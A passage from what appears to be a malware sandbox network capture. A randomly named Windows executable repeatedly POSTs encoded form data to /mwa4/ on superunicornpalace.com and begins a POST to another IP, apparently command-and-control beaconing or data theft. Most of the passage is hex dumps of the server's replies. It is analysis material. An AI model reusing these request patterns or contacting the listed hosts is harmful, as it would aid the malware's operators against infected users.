                                                    Data Ascii: /&ZJv<{'?e*(e%8?t_~j|D*R<![*%,Y~%_>~0%UWyyy,=R#U1MTOWSaNHtz*XEJK_ GmJ`WT( `L);NU
                                                    Jul 3, 2024 17:52:56.514338970 CEST1236INData Raw: 38 83 3e b2 3e 84 61 9d 98 75 d3 05 dd 51 15 9d d1 e1 84 f3 59 20 e4 89 64 c4 b7 77 32 89 73 6c 87 bf 42 88 54 a8 c3 bd bc 99 07 08 8a a8 dd 40 b0 d9 a6 25 36 99 57 45 c9 40 e0 d8 0e a7 4a cb 7f 82 75 9a ab 3a 2e eb a9 df e3 d2 2c e4 ec 6c a8 68
                                                    Data Ascii: 8>>auQY dw2slBT@%6WE@Ju:.,lh:{.g~5COF4J@(uGG:-+Z=goy8!(|E=ag~+s]Zj<w!-k)-BZ[$oD+=8z
                                                    Jul 3, 2024 17:52:56.519009113 CEST1236INData Raw: 3b fa 76 eb b5 a3 68 37 df 32 31 ef 7d c5 d5 e8 a3 13 52 a4 c3 ac 08 e5 ba 56 39 6a a0 ef 35 e6 6a 90 b8 6b cf 4a 37 2d 76 90 c2 be f6 51 c2 bc f5 11 42 bf 6c d3 41 bd 51 43 83 63 38 14 f6 74 1d 6c 57 67 f0 cf f0 84 4e 68 63 52 d9 7e 49 7c 99 de
                                                    Data Ascii: ;vh721}RV9j5jkJ7-vQBlAQCc8tlWgNhcR~I|jU"D/j-|ilUf<Y]8xyw}($:V7H(Zt&j5MU:au0^wH)7~t:0s,g>PC<0M-1_WA


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.649760144.208.124.10805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:52:58.434169054 CEST655OUTPOST /mwa4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    Origin: http://www.superunicornpalace.com
                                                    Referer: http://www.superunicornpalace.com/mwa4/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4d 49 46 49 4b 70 6e 6e 72 79 5a 51 34 6f 35 78 6d 58 4c 50 66 39 37 6e 6f 72 75 79 58 71 65 63 36 56 4a 30 74 66 61 39 44 63 76 34 30 76 34 73 76 36 76 4b 32 6a 2b 35 6a 4c 68 6a 45 72 63 7a 32 74 59 39 71 37 2f 44 57 72 39 41 6a 44 61 65 30 50 50 67 43 4b 43 6f 62 53 45 63 64 76 2b 65 57 4c 44 37 6f 38 48 52 57 4e 6f 6c 35 34 61 41 39 61 49 2f 51 6a 49 52 6b 54 4b 47 66 56 38 6e 37 34 52 48 48 63 65 67 4b 6b 42 63 45 42 36 59 78 30 41 74 76 43 63 50 4b 42 58 35 4e 43 73 34 48 31 4a 37 4c 55 44 6c 58 44 79 4b 62 4c 47 2b 38 47 2f 7a 63 4c 50 39 54 56 72 59 32 4a 66 7a 36 32 39 67 57 2f 6e 48 79 44 53 48 77 30 45 73 72 69 53 6d 67 7a 7a 55 4d 74 34 34 59 34 6e 78 4b 51 3d 3d
                                                    Data Ascii: 7Dihs8p=MIFIKpnnryZQ4o5xmXLPf97noruyXqec6VJ0tfa9Dcv40v4sv6vK2j+5jLhjErcz2tY9q7/DWr9AjDae0PPgCKCobSEcdv+eWLD7o8HRWNol54aA9aI/QjIRkTKGfV8n74RHHcegKkBcEB6Yx0AtvCcPKBX5NCs4H1J7LUDlXDyKbLG+8G/zcLP9TVrY2Jfz629gW/nHyDSHw0EsriSmgzzUMt44Y4nxKQ==
                                                    Jul 3, 2024 17:52:58.994687080 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                    x-tec-api-version: v1
                                                    x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                    x-tec-api-origin: https://superunicornpalace.com
                                                    transfer-encoding: chunked
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    date: Wed, 03 Jul 2024 15:52:58 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 66 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 6b 8f db b8 92 fd 3c 0d ec 7f 60 ab 71 dd d2 84 92 25 f9 d9 72 94 c1 dc 24 73 71 17 33 9b c1 24 c1 62 91 0e 02 5a 2a d9 4c f4 1a 92 6a bb d7 e3 ff be 20 25 d9 b2 5b 7e a4 3d 9b 4e 3a 16 55 75 4e b1 58 2c b2 48 bf bc 7e f3 ee f5 87 ff f9 fd 2d 9a 8b 24 7e f5 1f 57 2f e5 ff 28 26 e9 cc d7 20 35 3f be d7 50 10 13 ce 7d 2d 48 78 42 b8 00 c6 bf 48 19 4d 09 03 09 e5 ff 09 08 82 82 39 61 1c 84 af 7d fc f0 8b 39 d6 50 77 f3 26 25 09 f8 da 03 85 45 9e 31 a1 a1 20 4b 05 a4 c2 d7 16 34 14 73 3f 84 07 1a 80 a9 1e 30 a2 29 15 94 c4 26 0f 48 0c be 83 51 42 96 34 29 92 ba e1 29 70 94 b1 84 08 33 04 01 81 a0 59 da 20 10 10 43 3e cf 52 f0 d3 ac 52 8c 69 fa 0d 31 88 7d 2d 67 59 44 63 d0 d0 9c 41 e4 6b dd ee 2c c9 67 56 c6 66 dd 65 94 76 1d e7 a9 02 4d 67 53 12 7c ab 35 e6 42 e4 5e b7 cb 8b 1c 58 91 d2 20 63 69 4e 62 12 80 15 64 49 77 99 c4 2c 0f ac 7c 9e 57 40 82 8a 18 5e fd 4e 66 80 d2 4c a0 28 2b d2 10 75 6e c6 ae e3 4c d0 c7 52 1f fd ae 00 5e 76 4b e1 ca b5 ca 81 [TRUNCATED]
                                                    Data Ascii: f81Zk<`q%r$sq3$bZ*Lj %[~=N:UuNX,H~-$~W/(& 5?P}-HxBHM9a}9Pw&%E1 K4s?0)&HQB4))p3Y C>RRi1}-gYDcAk,gVfevMgS|5B^X ciNbdIw,|W@^NfL(+unLR^vK,fnwI23g u_]6L@>O7RYb 9{xH4 r$u&l~@nou$=N<,EW{v'5xw}W/yh.qQ_)[WWOOa,rH=AG>ZiS#5O{.rwUpn1*3lw{Ky3ka<<0Sha0+X,PfT"7iEl2pZ_O5z=x>)G2
                                                    Jul 3, 2024 17:52:58.994719028 CEST224INData Raw: 11 29 44 66 ce 20 05 46 04 84 d2 a1 d7 51 91 aa 54 a5 53 9c 1a ab 07 c2 50 86 39 86 49 dd 8e 02 1d 8c 95 60 8f ea 9d f0 57 bc c8 65 ee fc 00 5c 70 0f b0 a0 09 70 41 92 dc d3 53 58 a0 37 44 80 61 3d 90 b8 80 77 91 6e ac 27 1c 38 a7 59 fa 5e 64 8c
                                                    Data Ascii: )Df FQTSP9I`We\ppASX7Da=wn'8Y^d - 3F0u@D0t>iXAmlc>nz8:8Klc_Zy]o @[!/)U6c@,E`z@>cU
                                                    Jul 3, 2024 17:52:58.994729042 CEST1236INData Raw: 04 df f7 d9 27 f1 79 6d 6c 1d 5c d4 0e e6 0b 2a dd 2f 8c 55 40 38 68 51 4c 66 9a 57 29 a6 3a 60 ed be 08 c7 bd e0 be 08 a3 a8 77 5f 44 60 47 f7 85 6b db e1 7d e1 0e c9 a8 6c d1 0e 8a 4d 77 c4 8c 9f ae 1d ef 7a 17 36 8c c8 86 22 8c 7a 4d 28 f5 ca
                                                    Data Ascii: 'yml\*/U@8hQLfW):`w_D`Gk}lMwz6"zM(ADQ}m|4>CsC~5lEkq;I<i"!C9wP)JOimm|e+g;Q=rR0_+"B]r"_q6% G\4hI(H_l;
                                                    Jul 3, 2024 17:52:58.994740009 CEST224INData Raw: 83 90 72 d1 dd c1 2a e9 55 1d 59 c7 85 2a 24 bf 27 2e d4 f9 1c 0d 4c 31 87 04 cc 73 82 e3 8c 0a 55 86 4e 69 e9 b4 10 22 4b bf 7c 91 e7 49 ab 20 8b 33 e6 dd 44 51 34 d9 fa dc ac 5a 7b 6e 6f d4 0b 26 65 f4 98 8c 84 b4 e0 de dd dd dd 5d be 9c 4c b3
                                                    Data Ascii: r*UY*$'.L1sUNi"K|I 3DQ4Z{no&e]LM7C2<XS@@C//m&rir9 Yo/Med#m4#c;gjW~Y2En7,d<tc?V4.(3&NA]|1<$E
                                                    Jul 3, 2024 17:52:58.994843960 CEST1236INData Raw: 8e 4c 2b 64 4e 62 30 73 9a 4a ea 68 34 0e c9 a8 5d ee 81 3e d0 d0 64 10 7a e8 26 88 5c 70 a1 5d 2e 2e 12 9a 66 05 37 4b 85 8c 91 74 56 da 30 bc b3 ed b3 74 88 dc 56 4a 73 82 e9 61 15 79 ac 60 ce 64 5d 63 4a af 78 e8 66 34 0d 83 e9 a0 9d a1 34 66
                                                    Data Ascii: L+dNb0sJh4]>dz&\p]..f7KtV0tVJsay`d]cJxf44fGC{oWN-CDApw=80&t^<wbt<t3vR=80TC79?r Dv<tC5RaV)v\BiNoCGuG1;;
                                                    Jul 3, 2024 17:52:58.994889975 CEST1236INData Raw: dc f6 0c e4 67 e4 b4 67 b0 ec a5 94 72 ff d5 12 99 7b 72 55 2e bb 9c f0 fc 1c f6 1c ae e7 e4 ae 67 f0 3c 23 67 3d 83 e5 fb 73 d5 33 48 be 37 47 3d 9b e2 60 6e da b3 60 7b 42 5d a5 c5 fa 8e a0 91 8a 1b fb a9 b6 ec b2 d1 38 75 0f d1 16 f7 7b 21 b4
                                                    Data Ascii: ggr{rU.g<#g=s3H7G=`n`{B]8u{!5g\[<Pk#hk4..3{N[rwbu~U~"p9[j^^"&5E4[xvZ+Xj|ue`nVOm|jh+oX* +g*
                                                    Jul 3, 2024 17:52:58.994901896 CEST1236INData Raw: 4e 92 d6 af 6b b9 02 d5 83 eb de ce df 0b 59 2b 2e 35 f3 0f d5 1f dc ad 40 03 f3 2b ee 6f 44 92 dd 3b 40 bb da 59 15 7f 58 f3 bb 2c 99 6b 35 70 5d a3 1a 38 ec c3 32 ad 56 60 66 cc 8b f8 9e 99 14 07 66 8c 9a 3d 68 73 35 7b cf 93 b8 97 b6 62 df 27
                                                    Data Ascii: NkY+.5@+oD;@YX,k5p]82V`ff=hs5{b'Oc_R:_=eLXtg}.\$l`qp6PV@K|`xu+6rdA s"NUX:?nYVv:|DF2Jm
                                                    Jul 3, 2024 17:52:58.995003939 CEST798INData Raw: 70 28 59 e2 c7 fb e6 95 64 f9 c4 15 f1 3d fe 47 2b 02 c6 3c bf 4f 4b a8 51 0c fa d2 d1 e4 e8 02 e4 7c 2e af 8d d6 42 92 bf 8e af 49 7b a2 85 10 a3 00 b6 33 69 19 ca 4c 8a ea c7 3b 29 87 76 c6 58 36 3a b0 98 5d e4 1b 23 c9 a0 12 66 6f 57 16 9a a9
                                                    Data Ascii: p(Yd=G+<OKQ|.BI{3iL;)vX6:]#foW?F! Xne!'9%d!*?f~Qin~G[F[(6cby8s~w'Q:ZpoiAp%l8D\fq4fEA/k+fV\aR,Pr;u|,
                                                    Jul 3, 2024 17:52:58.995014906 CEST1236INData Raw: 57 f1 c5 54 28 8c cf 20 cd c9 60 4c 7f 29 3b 4e 55 82 85 7a 67 1e 12 34 86 35 15 cb 75 59 c9 32 12 2b 99 51 05 23 1c a5 1e 08 25 2e a0 13 67 43 bf 23 31 c1 be 89 86 f8 9b c6 df f8 a4 84 f3 99 8d 6f f0 99 02 d0 49 34 81 08 30 6a ee 8f 8a 38 5b 82
                                                    Data Ascii: WT( `L);NUzg45uY2+Q#%.gC#1oI40j8[Dg\Sy+!XjSHl+r!j,xz/q0S5,jy^rnu:u,=[z5hjPU+qr*/L6}:XL NFZ">Kh`
                                                    Jul 3, 2024 17:52:58.995086908 CEST1236INData Raw: bc 07 c1 24 6f b9 b3 88 0c e0 a6 93 44 2b 04 3d 38 7a 14 1e 65 ae 8c a7 5b 75 fa 85 9f 8a 3b 87 a3 5e 2f 37 24 9b ad 29 05 66 96 b1 a4 98 3f 53 d1 c2 36 24 e3 48 3b ee c6 53 61 7b 33 30 5d 6b cb 0b ad 61 67 39 70 7c 68 e3 f1 6f 3f da 23 b5 84 1a
                                                    Data Ascii: $oD+=8ze[u;^/7$)f?S6$H;Sa{30]kag9p|ho?#8#j$FMN=`>ufV5[v8E<9+&7lcK0`?Tf*Zh_8_q(Lkb`.S^]0vDdGe+T}q:wD$}xz~!Z7
                                                    Jul 3, 2024 17:52:59.001957893 CEST1236INData Raw: 31 11 b9 ab 5f 1b c8 57 41 80 c9 94 e0 0c 86 af a3 13 e4 4f b1 92 41 c5 38 c9 56 b2 aa 92 d2 71 ec 18 59 66 2b a5 d2 70 e3 0d 16 81 73 bd f7 e5 18 ae f7 26 af 8b bd d3 13 7f d1 85 cb fa de 7b 75 bb 37 4b 97 e4 72 1e 8e fe 46 c2 26 a2 85 62 02 29
                                                    Data Ascii: 1_WAOA8VqYf+ps&{u7KrF&b)uD+7:2Efcn@iUNk&&U-+=m[dk13@U1}[/7:V\^])-Est#/-Lgx&cpp


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.649761144.208.124.10805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:00.976248980 CEST1668OUTPOST /mwa4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    Origin: http://www.superunicornpalace.com
                                                    Referer: http://www.superunicornpalace.com/mwa4/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Raw: 37 44 69 68 73 38 70 3d 4d 49 46 49 4b 70 6e 6e 72 79 5a 51 34 6f 35 78 6d 58 4c 50 66 39 37 6e 6f 72 75 79 58 71 65 63 36 56 4a 30 74 66 61 39 44 66 50 34 30 65 59 73 39 70 48 4b 31 6a 2b 35 67 4c 68 6d 45 72 63 55 32 73 77 35 71 37 79 68 57 70 46 41 68 68 53 65 6a 4e 6e 67 49 4b 43 6f 47 69 45 66 43 2f 2b 78 57 4c 54 2f 6f 38 58 52 57 4e 6f 6c 35 37 53 41 71 59 77 2f 53 6a 49 53 30 7a 4b 77 49 46 38 62 37 34 6f 2f 48 63 4b 77 4a 58 5a 63 46 68 71 59 7a 48 6f 74 77 79 63 4e 45 68 57 73 4e 43 70 6f 48 31 56 33 4c 56 33 50 58 44 32 4b 59 75 7a 69 76 31 62 71 4b 72 58 6b 48 6b 62 64 7a 2f 54 52 34 32 46 66 54 74 7a 6c 39 54 4f 31 33 41 64 30 71 54 62 4c 33 79 48 66 49 62 4a 4c 61 62 57 65 52 37 78 61 43 47 31 45 67 4a 41 6c 4d 72 44 39 56 38 37 44 78 55 39 65 61 32 62 71 78 68 57 48 49 66 46 61 6d 45 62 49 76 4e 4e 4d 45 69 47 57 49 37 30 6a 34 44 35 57 44 4b 62 76 47 32 71 6f 6d 4d 79 32 2b 44 30 42 45 58 4f 74 33 30 43 75 67 33 31 53 5a 30 35 52 79 6a 4e 42 74 55 44 6c 73 6c 34 68 77 4e 32 4e 64 6b [TRUNCATED]
                                                    Data Ascii: 7Dihs8p=MIFIKpnnryZQ4o5xmXLPf97noruyXqec6VJ0tfa9DfP40eYs9pHK1j+5gLhmErcU2sw5q7yhWpFAhhSejNngIKCoGiEfC/+xWLT/o8XRWNol57SAqYw/SjIS0zKwIF8b74o/HcKwJXZcFhqYzHotwycNEhWsNCpoH1V3LV3PXD2KYuziv1bqKrXkHkbdz/TR42FfTtzl9TO13Ad0qTbL3yHfIbJLabWeR7xaCG1EgJAlMrD9V87DxU9ea2bqxhWHIfFamEbIvNNMEiGWI70j4D5WDKbvG2qomMy2+D0BEXOt30Cug31SZ05RyjNBtUDlsl4hwN2NdkeLtPMAoC8mrxFaD4fmE6h99zWixvGfRhE7nkHhzXatu4twf5UrW3Kr/NPO4dJIbT4Gj4OiJkizd6qUpQ36xxyXwzas2nnIkweOSK7PdNbA8Y+WIpb+6mtB1Gu8YXwGL1y7/CKiFDaYTMOshS1lazbAJTbcbDW+1qDABf6T0fDK4UoBNYNdz66w+wFL8T/9Nmf9DZK/X+Ds0cKTiHeUXfw7Dj+210mAOE3TJEhLXmReFIkGxAdVKXTuV4Rx9ffTxuC5n9vndVjFZf8b0+vG4+u1fn5MD+NO5NegmMjxQPQu171AsTe25d6Of2qt6YNPux1U6IRco+okRvUQes4PgIrUKRbOantJ0b7AdDAuRq1c2jQABVFIIAzbALMAQa6L21UxBzegVciiauRLCtOEH0JV1qc/2wliEzbRKYK6hBVU8x8+4Rsui368OTS5i++vLsEJ1RXgHec3WtZGXbiazHGZyOy6n5oSchTg2r6B9K5NHKMUtieHCyCbPM90hvkFynCfN3mTY54/+msdG7VSKIWTh4v9VmJU4b2wcvOSUjYRkCA8yiEn48ofBsBfjZt2y7nu46AqB4bkGXw/4Hpt+kA1K7DGxqPW01jG0CQ09WIgIaohncqGYh+fm9EqXywrLn0Qivb/xX8LKdLnAVY9mLmAa63b4PTNrjpC [TRUNCATED]
                                                    Jul 3, 2024 17:53:01.519268036 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                    x-tec-api-version: v1
                                                    x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                    x-tec-api-origin: https://superunicornpalace.com
                                                    transfer-encoding: chunked
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    date: Wed, 03 Jul 2024 15:53:01 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 66 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 6b 8f db b8 92 fd 3c 0d ec 7f 60 ab 71 dd d2 84 92 25 f9 d9 72 94 c1 dc 24 73 71 17 33 9b c1 24 c1 62 91 0e 02 5a 2a d9 4c f4 1a 92 6a bb d7 e3 ff be 20 25 d9 b2 5b 7e a4 3d 9b 4e 3a 16 55 75 4e b1 58 2c b2 48 bf bc 7e f3 ee f5 87 ff f9 fd 2d 9a 8b 24 7e f5 1f 57 2f e5 ff 28 26 e9 cc d7 20 35 3f be d7 50 10 13 ce 7d 2d 48 78 42 b8 00 c6 bf 48 19 4d 09 03 09 e5 ff 09 08 82 82 39 61 1c 84 af 7d fc f0 8b 39 d6 50 77 f3 26 25 09 f8 da 03 85 45 9e 31 a1 a1 20 4b 05 a4 c2 d7 16 34 14 73 3f 84 07 1a 80 a9 1e 30 a2 29 15 94 c4 26 0f 48 0c be 83 51 42 96 34 29 92 ba e1 29 70 94 b1 84 08 33 04 01 81 a0 59 da 20 10 10 43 3e cf 52 f0 d3 ac 52 8c 69 fa 0d 31 88 7d 2d 67 59 44 63 d0 d0 9c 41 e4 6b dd ee 2c c9 67 56 c6 66 dd 65 94 76 1d e7 a9 02 4d 67 53 12 7c ab 35 e6 42 e4 5e b7 cb 8b 1c 58 91 d2 20 63 69 4e 62 12 80 15 64 49 77 99 c4 2c 0f ac 7c 9e 57 40 82 8a 18 5e fd 4e 66 80 d2 4c a0 28 2b d2 10 75 6e c6 ae e3 4c d0 c7 52 1f fd ae 00 5e 76 4b e1 ca b5 ca 81 [TRUNCATED]
                                                    Data Ascii: f81Zk<`q%r$sq3$bZ*Lj %[~=N:UuNX,H~-$~W/(& 5?P}-HxBHM9a}9Pw&%E1 K4s?0)&HQB4))p3Y C>RRi1}-gYDcAk,gVfevMgS|5B^X ciNbdIw,|W@^NfL(+unLR^vK,fnwI23g u_]6L@>O7RYb 9{xH4 r$u&l~@nou$=N<,EW{v'5xw}W/yh.qQ_)[WWOOa,rH=AG>ZiS#5O{.rwUpn1*3lw{Ky3ka<<0Sha0+X,PfT"7iEl2pZ_O5z=x>)G2
                                                    Jul 3, 2024 17:53:01.519328117 CEST1236INData Raw: 11 29 44 66 ce 20 05 46 04 84 d2 a1 d7 51 91 aa 54 a5 53 9c 1a ab 07 c2 50 86 39 86 49 dd 8e 02 1d 8c 95 60 8f ea 9d f0 57 bc c8 65 ee fc 00 5c 70 0f b0 a0 09 70 41 92 dc d3 53 58 a0 37 44 80 61 3d 90 b8 80 77 91 6e ac 27 1c 38 a7 59 fa 5e 64 8c
                                                    Data Ascii: )Df FQTSP9I`We\ppASX7Da=wn'8Y^d - 3F0u@D0t>iXAmlc>nz8:8Klc_Zy]o @[!/)U6c@,E`z@>cU'yml\*/
                                                    Jul 3, 2024 17:53:01.519396067 CEST448INData Raw: e6 71 31 a3 29 ef fe 2a 71 de 2b 9c 2e e1 1c 04 ef 72 41 04 0d ba 0d 86 6e c0 79 f3 d9 0a 78 59 30 8c ac 3b 6b 78 5b d6 60 b7 6a f6 2a 5b 12 08 29 f1 6f 49 1c 97 05 b5 32 5e 99 bd c8 cd b2 fa 28 fb 63 d2 54 ae c2 65 0f 54 85 bd 45 79 75 75 f5 03
                                                    Data Ascii: q1)*q+.rAnyxY0;kx[`j*[)oI2^(cTeTEyuuMf"7yBcxH>*u<&*A5MdyAR1iB`JZ|Nl,<@a3zFe=t5ILgLz.gVrrFQk/28"7q|3c:e=~Wr*UY*$'.
                                                    Jul 3, 2024 17:53:01.519431114 CEST1236INData Raw: 8e 4c 2b 64 4e 62 30 73 9a 4a ea 68 34 0e c9 a8 5d ee 81 3e d0 d0 64 10 7a e8 26 88 5c 70 a1 5d 2e 2e 12 9a 66 05 37 4b 85 8c 91 74 56 da 30 bc b3 ed b3 74 88 dc 56 4a 73 82 e9 61 15 79 ac 60 ce 64 5d 63 4a af 78 e8 66 34 0d 83 e9 a0 9d a1 34 66
                                                    Data Ascii: L+dNb0sJh4]>dz&\p]..f7KtV0tVJsay`d]cJxf44fGC{oWN-CDApw=80&t^<wbt<t3vR=80TC79?r Dv<tC5RaV)v\BiNoCGuG1;;
                                                    Jul 3, 2024 17:53:01.519464016 CEST350INData Raw: dc f6 0c e4 67 e4 b4 67 b0 ec a5 94 72 ff d5 12 99 7b 72 55 2e bb 9c f0 fc 1c f6 1c ae e7 e4 ae 67 f0 3c 23 67 3d 83 e5 fb 73 d5 33 48 be 37 47 3d 9b e2 60 6e da b3 60 7b 42 5d a5 c5 fa 8e a0 91 8a 1b fb a9 b6 ec b2 d1 38 75 0f d1 16 f7 7b 21 b4
                                                    Data Ascii: ggr{rU.g<#g=s3H7G=`n`{B]8u{!5g\[<Pk#hk4..3{N[rwbu~U~"p9[j^^"&5E4[xvZ+Xj|ue`nVOm|jh+oX* +g*
                                                    Jul 3, 2024 17:53:01.519534111 CEST1236INData Raw: 31 63 30 39 0d 0a cc 3d fd 6f db 46 b2 3f 3b 40 fe 87 05 8d be 97 f4 44 5b f2 47 ec a3 d2 dc 6b 93 2b 5e 81 bb 5e de 6b 0b 3c a0 0a 04 4a a4 6d d6 34 57 20 29 3b ae a0 ff fd 61 66 f6 63 96 5c 52 74 a2 a6 d7 00 77 32 b9 9c 9d 9d 9d 9d 9d af 9d 65
                                                    Data Ascii: 1c09=oF?;@D[Gk+^^k<Jm4W );afc\Rtw2e(&BaC8^<):vR[lx~tyt;le9f:UM%h#mUua+SaYwUw,oYa?O~)Y_~gx!-wY"yVi)ry-0
                                                    Jul 3, 2024 17:53:01.519615889 CEST1236INData Raw: 58 bb c9 0d da 43 1c cb bb c8 4e 35 fb 30 a2 e4 a0 7b 8c 4b bf 59 d3 0f bc db 7f bb 8a ef b2 fc f1 9b 6f 8b 3a 5b fe e5 5d 96 c8 22 fd 8f c3 f1 e9 e5 d4 94 3d eb 74 da 9b 2a 06 3b e5 f0 f5 ba 4e 8b 45 5a 5e 87 57 25 56 87 4c e8 98 f5 1e 78 c2 80
                                                    Data Ascii: XCN50{KYo:[]"=t*;NEZ^W%VLx>n{%iHu6VdapVF6K<~JUa.cOA(D2_>UvFlXOfdT"tY(<[WYDsj^2K u
                                                    Jul 3, 2024 17:53:01.519665003 CEST448INData Raw: 3d 7c bc bf 7e 70 47 73 93 25 e9 5e 46 03 80 d4 60 bb 47 93 a7 55 a5 47 03 bf 3d a3 69 c2 79 d2 68 b4 ba 33 27 ad 66 8e 1c e8 cc d3 af c0 d5 9b 0d 11 68 bb d5 a6 f2 23 35 fd 20 f0 bd d5 02 e7 9b 8d 81 09 36 f3 76 3b 47 c5 f2 83 e1 b6 27 e1 a7 02
                                                    Data Ascii: =|~pGs%^F`GUG=iyh3'fh#5 6v;G'dc'YqG5krN{ue,<,,Z-gxof}o^z@c.]fx ,3SZ5\\8g7gIvoL:)EwWP/&ZJv<{
                                                    Jul 3, 2024 17:53:01.519716024 CEST1236INData Raw: 57 f1 c5 54 28 8c cf 20 cd c9 60 4c 7f 29 3b 4e 55 82 85 7a 67 1e 12 34 86 35 15 cb 75 59 c9 32 12 2b 99 51 05 23 1c a5 1e 08 25 2e a0 13 67 43 bf 23 31 c1 be 89 86 f8 9b c6 df f8 a4 84 f3 99 8d 6f f0 99 02 d0 49 34 81 08 30 6a ee 8f 8a 38 5b 82
                                                    Data Ascii: WT( `L);NUzg45uY2+Q#%.gC#1oI40j8[Dg\Sy+!XjSHl+r!j,xz/q0S5,jy^rnu:u,=[z5hjPU+qr*/L6}:XL NFZ">Kh`
                                                    Jul 3, 2024 17:53:01.519751072 CEST1236INData Raw: bc 07 c1 24 6f b9 b3 88 0c e0 a6 93 44 2b 04 3d 38 7a 14 1e 65 ae 8c a7 5b 75 fa 85 9f 8a 3b 87 a3 5e 2f 37 24 9b ad 29 05 66 96 b1 a4 98 3f 53 d1 c2 36 24 e3 48 3b ee c6 53 61 7b 33 30 5d 6b cb 0b ad 61 67 39 70 7c 68 e3 f1 6f 3f da 23 b5 84 1a
                                                    Data Ascii: $oD+=8ze[u;^/7$)f?S6$H;Sa{30]kag9p|ho?#8#j$FMN=`>ufV5[v8E<9+&7lcK0`?Tf*Zh_8_q(Lkb`.S^]0vDdGe+T}q:wD$}xz~!Z7
                                                    Jul 3, 2024 17:53:01.524386883 CEST1236INData Raw: 31 11 b9 ab 5f 1b c8 57 41 80 c9 94 e0 0c 86 af a3 13 e4 4f b1 92 41 c5 38 c9 56 b2 aa 92 d2 71 ec 18 59 66 2b a5 d2 70 e3 0d 16 81 73 bd f7 e5 18 ae f7 26 af 8b bd d3 13 7f d1 85 cb fa de 7b 75 bb 37 4b 97 e4 72 1e 8e fe 46 c2 26 a2 85 62 02 29
                                                    Data Ascii: 1_WAOA8VqYf+ps&{u7KrF&b)uD+7:2Efcn@iUNk&&U-+=m[dk13@U1}[/7:V\^])-Est#/-Lgx&cpp


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.649762144.208.124.10805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:03.505568981 CEST354OUTGET /mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:04.070106983 CEST491INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    x-redirect-by: WordPress
                                                    location: http://superunicornpalace.com/mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs=
                                                    content-length: 0
                                                    date: Wed, 03 Jul 2024 15:53:04 GMT
                                                    server: LiteSpeed


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.649763162.43.101.114805776C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 17:53:09.675602913 CEST598OUTPOST /rxdf/ HTTP/1.1
                                                    Accept: */*
